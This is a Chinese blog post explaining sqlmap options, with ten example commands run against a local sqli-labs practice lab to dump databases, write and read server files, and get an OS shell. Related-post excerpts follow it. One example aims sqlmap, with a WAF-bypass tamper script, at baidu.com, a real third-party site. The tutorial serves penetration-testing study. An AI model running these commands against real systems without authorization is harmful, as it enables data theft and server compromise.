sqlmap参数详解

已于 2022-04-09 19:23:02 修改
阅读量6.9k 收藏 41
点赞数 11
分类专栏: 渗透工具篇 文章标签: mysql
于 2022-04-09 16:32:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jerry_GuJY/article/details/124061860
版权

命令及详解

-h帮助
--version版本号
-d连接数据库"mysql://root:root@192.168.3.20:3306/db"   "数据库种类://账号:密码@地址:端口/库
--current-db当前数据库
--dbs列出所有数据库 等于show database()
--tables列出某库的所有表
--columns列出某表的所有列
-D选择哪个数据库
-T选择哪个表
-C选择哪个列
--dump 获取字段里的数据
--dump-al脱库
--batch

选项全选yes

--smart启发式快速判断
--formspost请求注入 ,http包头包体每个字段尝试注入, --level最好是2
-r

从文件中载入http请求,指定数据包 先抓一个包然后保存下来使用-r

-g从谷歌里按照谷歌语法搜索前100条有get请求的url去测试
-o开启性能优化,优化的分别为--keep-alive,--null-connection,--thread
--tamper使用脚本,多脚本用逗号隔开 通常绕过waf
-v回显等级0~6
--delay访问间隔,绕过waf
--os-shell获取webshell
-m读取文件中的url批量操作
--datapost请求的包体可以直接写后面
--timeout设置超时时间
-level 注入探索等级,一般用4
--is-dba

是否是dba权限

--risk 风险等级(0-3,默认为1)
--identify-waf检测防火墙类型
--param-del设置参数分隔符
--skip-urlencode跳过url编码
--keep-alive这是持久连接,加快探测速度
--null-connection检索没有body响应内容,多用于盲注
--thread设置线程数,最大10
--technique  选择注入类型 B 布尔注入,E报错注入,U联合注入 T时间盲注 S 使用sqlmap的配置,如果是布尔盲注应选择U而并非B
--cookie "t=1"cookie注入
--safe-url每隔一段时间去访问安全页面
--proxy代理
--file-read读取服务器里的哪个文件,等同于手工注入的load_file()
--file-write选取本地的哪个文件
--file-dest写入服务器里的哪个文件 ,等同于手工注入的into out_file()和--file-write 一起使用
--dbms设置数据库类型

只要是单词或者是单词缩写的前面都是--,只要是单字母前面都是-

实例注解:

1、获取所有数据库

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o --dbs --batch  
--level=1 --threads=10 --dbms=MySql --technique="U"

#-u url
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入

2、获取test库中的表

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D test 
--tables --batch  --level=1 --threads=10 --dbms=MySql --technique="U"

#-u url
#-o 开启性能优化
#-D test 选择test库
#--tables 获取test库里的所有表
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入

3、获取make表中的字段

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D test -T make 
--columns --batch  --level=1 --threads=10 --dbms=MySql --technique="U"

#-u url
#-o 开启性能优化
#-D test 选择test库
#-T make 选择make表
#--columns 获取make表里的所有字段
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入

4、获取数据

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" -o -D longmao -T make 
--dump --batch  --level=1 --threads=10 --dbms=MySql --technique="U"

#-u url
#-o 开启性能优化
#-D test 选择test库
#-T make 选择make表
#--dump  获取make表里的所有数据
#--batch 操作默认选择为y
#--level=1 注入探索等级为1
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="U" 设置注入类型为联合注入

5、写入文件到服务器

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" --batch --dbms=MySql  
--file-write="1.php" --file-dest="D:/phpStudy/PHPTutorial/WWW/1.php"

#-u url
#--batch 操作默认选择为y
#--dbms=MySql 设置数据库为MySql
#--file-write="1.php"   选择本地文件1.php
#--file-dest="D:/phpStudy/PHPTutorial/WWW/1.php"  把本地1.php文件写入到服务器根目录里1.php文件

6、从服务器读入文件

sqlmap -u http://192.168.3.35/sqli-labs-master/Less-1/?id=1 --batch --dbms=MySql
--file-read="D:/phpStudy/PHPTutorial/WWW/1.php"

#-u url
#--batch 操作默认选择为y
#--dbms=MySql 设置数据库为MySql
#--file-read="1.php"  下载服务器根目录下的1.php文件

7、UA头注入

sqlmap -r "tt" -o --dbs --batch  --level=3 --threads=10 --dbms=MySql --technique="E"

#-r tt 从tt文件中载入http请求,tt文件中需要把UA头后面加上*号
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--level=3 注入探索等级为3
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--technique="E" 设置注入类型为报错注入

8、获取webshell

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-1/?id=1" --os-shell

#-u url
#--os-shell 获取webshell

9、设置代理

sqlmap -u "https://www.baidu.com" -o --dbs --batch --proxy socks5://192.168.3.35:10888 
--level=4 --tamper=space2comment --threads=10 --dbms=MySql

#-u url
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--proxy socks5://192.168.3.35:10888  设置代理
#--level=4 注入探索等级为4
#--tamper=space2comment 使用脚本绕过waf
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql

10、Post布尔延迟注入

sqlmap -u "http://192.168.3.35/sqli-labs-master/Less-18/" -o --dbs --batch  
--level=3 --threads=10 --dbms=MySql --forms --technique="UT"

#-u url
#-o 开启性能优化
#--dbs 爆破所有数据库
#--batch 操作默认选择为y
#--level=3 注入探索等级为3
#--threads=10 开启10个线程(最大10个)
#--dbms=MySql 设置数据库为MySql
#--forms  Post注入
#--technique="UT" 设置注入方式为U为布尔注入和T为延迟注入

资深程序员的转型渗透之路
关注
专栏目录
第三节 Sqlmap 请求参数设置-01
09-15
Sqlmap 请求参数设置详解 Sqlmap 是一款功能强大的渗透测试工具,能够自动检测和利用 SQL 注入漏洞。为了更好地使用 Sqlmap,需要了解如何设置请求参数以适应不同的检测场景。在本文中,我们将详细介绍 Sqlmap 的四...
第十节 Sqlmap注入参数1-01
09-15
Sqlmap 注入参数详解 Sqlmap 是一个开源的渗透测试工具,主要用于检测Web应用程序中的SQL注入漏洞。在使用 Sqlmap 时,需要了解一些关键参数,以便更好地对目标Web应用程序进行检测。本文将详细介绍 Sqlmap 的四个...
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
03-13 2302
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
SQLMap 使用参数详解
热门推荐
qq_37019068的博客
10-09 1万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
SQL 注入神器:SQLMap 参数详解
最新发布
Flag少侠的博客
05-01 1905
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
sqlmap参数大全
卖瓜小农的博客
02-23 8513
sqlmap参数大全 cookie注入:sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data “指定参数” 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehash.
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 7168
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs。
sqlmap详细的参数功能介绍(全面)
weixin_46709219的博客
11-13 5446
目录 介绍 命令参数 指定目标 直连数据库 服务型数据库(前提知道数据库用户名和密码) 文件型数据库(前提知道数据库绝对路径) URL探测 文件读取目标 Google dork注入 Http参数 设置请求方法 POST提交参数 设置参数分隔符 设置Cookie 设置User-Agent Host Referer 额外的HTTP头部 协议认证 设置代理 Tor匿名网络 设置...
SQLmap参数详解
Williamanddog的博客
01-19 5501
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
第六节 Sqlmap 请求参数设置4-01
09-15
Sqlmap 请求参数设置 Sqlmap 是一款功能强大且功能齐全的 SQL 注入检测工具,它提供了多种参数设置来调整其行为和性能。在本节中,我们将详细介绍 Sqlmap 的请求参数设置,包括设置超时、重试次数、随机化参数和...
第七节 Sqlmap 请求参数设置5-01
09-15
"Sqlmap 请求参数设置详解" Sqlmap 是一款功能强大且流行的 SQL 注入工具,它提供了多种参数设置以满足不同场景下的需求。在本节课程中,我们将深入探讨 Sqlmap 的请求参数设置,包括忽略401、设置 HTTP 协议私钥、...
第四节 Sqlmap 请求参数设置2-01
09-15
Sqlmap 请求参数设置详解 Sqlmap 是一个功能强大的 SQL 注入工具,它提供了多种方式来设置请求参数,以欺骗服务器和绕过安全检测。在本节中,我们将详细介绍 Sqlmap 的请求参数设置,包括 User-Agent、Host 头、...
sqlmap命令详解
Pitbull2014的博客
12-20 1118
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
SQLMAP 的基本使用步骤
qq_51768842的博客
05-09 997
sqlmap是一个自动化的SQL注入工具,主要功能是扫描,发现并利用漏洞。sqlmap的功能包括数据库指纹识别,数据库枚举,数据提取等等,并在获取完全的操作权限是执行任意命令
一文了解SQLMap
allintao的博客
02-27 2542
SQLMap是一款开源的渗透测试工具,可用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器 的权限等操作 SQLMap支持的数据库有:MySQL、Oracle、Microsoft SQL Server、Microsoft Access,IBM DB2、 SQLite等主流数据库 检测类型:union联合查询注入、布尔盲注、时间盲注、报错注入、堆叠注入。
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1240
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
Sqlmap详解
weixin_44311721的博客
04-17 2608
(1)Target(指定扫描目标) –version 查看sqlmap版本 1、-u + url (get方法提交参数) 2、-p + 指定参数(使–level失效) 3、-f (footprint 指纹) 注入结束后,查看数据库指纹信息(如:数据库版本) 4、–users 查询数据库账号信息 5、-- banner 查询数据库据库信息 6、–dbs 查询目标有哪些数据库 7、–schema 查看...
实验吧 简单的SQL注入2攻击笔记
JimGordonXu的博客
12-06 1366
背景:使用kali linux中的sqlmap 1.在进入sqlmao的终端界面后输入    sqlmap -u http://ctf5.shiyanba.com/web/index_2.php?id=1 --tamper=space2comment --dbs 其中:1.sqlmap:启动sqlmap。2.-u:参数 指目标的URL。3.--tamper:绕过WAF脚本。4.space2co
Sqlmap使用详解
weixin_44110913的博客
07-29 3288
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户(--users) 查看数据库所有用户名的密码(--passwords) 查看数据库当前用户(--current-user) 判断当前用户是否有管理权限(--is-dba 列出数据库管理员角色(--roles) 查看所有的数据库(--dbs) 查看当前的数据库(--current-db) 爆出指定数据库中的所有的表 爆...
sqlmap代码详解
07-27
sqlmap是一款用于自动化SQL注入的工具。下面是对引用内容的解释: 引用\[1\]中的代码是使用sqlmap进行数据库表名的获取。其中,-u参数指定了目标URL,--level参数指定了注入的深度,--smart参数启用了智能检测,--dbms参数指定了数据库管理系统为MySQL,-D参数指定了要操作的数据库名。 引用\[2\]中的代码是使用sqlmap执行SQL查询。其中,-u参数指定了目标URL,--sql-query参数指定了要执行的SQL查询语句,-v参数指定了详细程度为1。 引用\[3\]中的代码是使用sqlmap进行数据库名的获取,并将结果保存到日志文件中。其中,-u参数指定了目标URL,--level参数指定了注入的深度,--smart参数启用了智能检测,--dbms参数指定了数据库管理系统为MySQL,--dbs参数指定了要获取数据库名,-o参数指定了保存日志的文件名,--resume参数用于恢复已保存的进度。 综上所述,sqlmap是一款功能强大的工具,可以用于自动化地进行SQL注入攻击,并提供了丰富的参数和选项来满足不同的需求。 #### 引用[.reference_title] - *1* *2* *3* [sqlmap命令详解(最全版本)](https://blog.csdn.net/lkbzhj/article/details/126569453)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值